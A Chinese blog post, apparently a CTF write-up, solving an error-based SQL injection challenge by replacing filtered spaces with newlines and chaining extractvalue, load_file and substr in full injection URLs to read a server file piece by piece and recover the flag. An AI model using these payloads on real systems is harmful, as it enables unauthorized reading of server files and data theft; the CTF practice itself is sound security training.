美文网首页
CTF练习平台——报错注入

CTF练习平台——报错注入

作者: queena_ | 来源:发表于2018-02-08 21:00 被阅读0次
TIM截图20180208125700.png

这道题过滤了单引号、双引号等,最主要是过滤了空格,根据mysql的特性,我们可以用换行符代替空格符

这里我通过extractvalue报错,注入语句如下
http://103.238.227.13:10088/?id=1%0Aand%0aextractvalue(1,concat(0x7e,(select%0a@@version),0x7e))

成功报错

接下来根据题目提示我们要读取文件
http://103.238.227.13:10088/?id=1%0Aand%0a(extractvalue(1,concat(0x7e,(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))),0x7e)))

TIM截图20180208140201.png
extractvalue性质就是只能读32位,经过hex后得到的有用位是16位
事实上这个是函数截断了,读取文件本身没问题,所以接下来用strsub试试
http://103.238.227.13:10088/?id=1%0aand%0a(extractvalue(1,concat(0x7e,substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))%0afrom%0a161%0afor%0a20),0x7e)))
TIM截图20180208140835.png
接下来只要修改偏移逐渐恢复文件就行了
最后恢复的文件为:

<?php fdsafasfdsafidsafdsaifdsakfdsaifdsafdsafdsafdsafkdsa;fdsafdsafsdafdsafas0hfdsg9Flag:"7249f5a7fd1de602b30e6f39aea6193a"fsdafsafdsafdsafdsafa ?>

得到flag:

Flag:”7249f5a7fd1de602b30e6f39aea6193a”

相关文章

  • CTF练习平台——报错注入

    这道题过滤了单引号、双引号等,最主要是过滤了空格,根据mysql的特性,我们可以用换行符代替空格符 这里我通过ex...

  • CTF练习平台——sql注入2

    这题目真的坑,一直在试到底过滤了什么,一直无解想起用dirsearch扫一下(每次做不出来就喜欢拿工具扫一扫) 典...

  • 加了料的报错注入 - exp报错解法

    加了料的报错注入 - exp报错解法 原题链接 http://ctf5.shiyanbar.com/web/bao...

  • 报错注入

    HTTP分割注入 题目地址实验吧:加了料的报错注入。 地址:http://ctf5.shiyanbar.com/w...

  • CTF练习平台——实战2-注入

    题目提示了flag的内容,所以目标就是找到注入点再找到数据库最后一个表的名字 点开连接,看到这个网站发现有个查询框...

  • 时间盲注

    ctf练习平台的web15 看代码知道没有注入的回显,所以想到使用时间盲注。select case when......

  • 实验吧-加了料的报错注入

    加了料的报错注入 原题链接 http://ctf5.shiyanbar.com/web/baocuo/index....

  • CTF练习平台(七)

    求getshell 打开题目链接,让上传一个图片而不是PHP文件,但是根据惯例,只有成功上传一个php文件才能拿到...

  • CTF练习平台——wordpress

    根据提示,应该要在这个博客里搜集信息,登陆的账号和用户名应该就藏在里面 后来想用户名应该是博主用户名SUN,而又发...

  • CTF练习平台(八)

    wordpress 爆破得到后台登陆路径phpmyadmin,然后用在博客里面找到的账号密码登陆,然后在数据库里找...

网友评论

      本文标题:CTF练习平台——报错注入

      本文链接:https://www.haomeiwen.com/subject/nnhttftx.html